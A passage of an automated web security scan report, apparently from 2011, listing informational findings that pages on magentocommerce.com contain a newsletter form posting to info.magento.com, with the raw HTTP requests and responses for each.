Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
<div id="emailNewsletter" style="margin-bottom:10px;visibility:hidden;height:1px;">
<form action="http://www.feedburner.com/fb/a/emailverify" method="post" target="popupwindow" onsubmit="window.open('http://www.feedburner.com/fb/a/emailverifySubmit?feedId=828202', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset style="margin-bottom:15px; padding:10px; background:url(http://www.magentocommerce.com/images/uploads/bg_feedburner_email.gif) repeat-x 0 100% #dcebf6; border:1px solid #adcfde;">
...[SNIP]...
6.56. http://www.magentocommerce.com/magento-connect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /magento-connect

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /magento-connect HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:09:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176191; expires=Sat, 11-Aug-2012 15:09:51 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fmagento-connect%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:09:53 GMT
Content-Length: 91518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.57. http://www.magentocommerce.com/maps/online  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /maps/online

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /maps/online HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176432; expires=Sat, 11-Aug-2012 15:13:52 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fmaps%2Fonline%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:52 GMT
Content-Length: 34637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.58. http://www.magentocommerce.com/media/interviews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170899; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A2%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.3.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:41:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313170909; expires=Sat, 11-Aug-2012 13:41:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A1%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:41:50 GMT
Content-Length: 37734

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.59. http://www.magentocommerce.com/media/interviews/alpedia/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/alpedia/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/alpedia/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175966; expires=Sat, 11-Aug-2012 15:06:06 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A31%3A%22%2Fmedia%2Finterviews%2Falpedia%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:07 GMT
Content-Length: 38228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.60. http://www.magentocommerce.com/media/interviews/bright-light-media/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/bright-light-media/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/bright-light-media/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175934; expires=Sat, 11-Aug-2012 15:05:34 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fbright-light-media%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:34 GMT
Content-Length: 39078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.61. http://www.magentocommerce.com/media/interviews/buettenpapierfabrik-gmund/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/buettenpapierfabrik-gmund/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/buettenpapierfabrik-gmund/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175956; expires=Sat, 11-Aug-2012 15:05:56 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fmedia%2Finterviews%2Fbuettenpapierfabrik-gmund%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:56 GMT
Content-Length: 37720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.62. http://www.magentocommerce.com/media/interviews/jack-wolfskin/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/jack-wolfskin/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/jack-wolfskin/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175910; expires=Sat, 11-Aug-2012 15:05:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A37%3A%22%2Fmedia%2Finterviews%2Fjack-wolfskin%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:10 GMT
Content-Length: 39204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.63. http://www.magentocommerce.com/media/interviews/liaison-dangereuse/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/liaison-dangereuse/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/liaison-dangereuse/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175958; expires=Sat, 11-Aug-2012 15:05:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A42%3A%22%2Fmedia%2Finterviews%2Fliaison-dangereuse%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:58 GMT
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.64. http://www.magentocommerce.com/media/interviews/lodger-footwear/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/lodger-footwear/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/lodger-footwear/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175884; expires=Sat, 11-Aug-2012 15:04:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A39%3A%22%2Fmedia%2Finterviews%2Flodger-footwear%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:44 GMT
Content-Length: 37831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.65. http://www.magentocommerce.com/media/interviews/man-junk/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/man-junk/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/man-junk/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175946; expires=Sat, 11-Aug-2012 15:05:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fmedia%2Finterviews%2Fman-junk%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:47 GMT
Content-Length: 37429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.66. http://www.magentocommerce.com/media/interviews/nerdyshirts/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/nerdyshirts/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/nerdyshirts/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:06:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175960; expires=Sat, 11-Aug-2012 15:06:00 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A35%3A%22%2Fmedia%2Finterviews%2Fnerdyshirts%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:06:00 GMT
Content-Length: 37004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.67. http://www.magentocommerce.com/media/interviews/quadra-informatique-and-anneau-du-rhin-society/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/quadra-informatique-and-anneau-du-rhin-society/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175890; expires=Sat, 11-Aug-2012 15:04:50 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A70%3A%22%2Fmedia%2Finterviews%2Fquadra-informatique-and-anneau-du-rhin-society%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 38775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
<form method="post" enctype="application/x-www-form-urlencoded" action="http://info.magento.com/index.php/leadCapture/save" id="mktForm_1006" name="mktForm_1006">

<input class="input-topbg" name="Email" id="Email" type='text' value="Enter your email address" maxlength='255' tabIndex='1' onfocus="if(this.value==this.defau
...[SNIP]...
6.68. http://www.magentocommerce.com/media/interviews/sbs-broadcasting/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /media/interviews/sbs-broadcasting/view

Issue detail

The page contains a form which POSTs data to the domain info.magento.com. The form contains the following fields:

Request

GET /media/interviews/sbs-broadcasting/view HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:05:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175905; expires=Sat, 11-Aug-2012 15:05:05 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fmedia%2Finterviews%2Fsbs-broadcasting%2Fview%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:05:05 GMT
Content-Length: 38327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
</span>
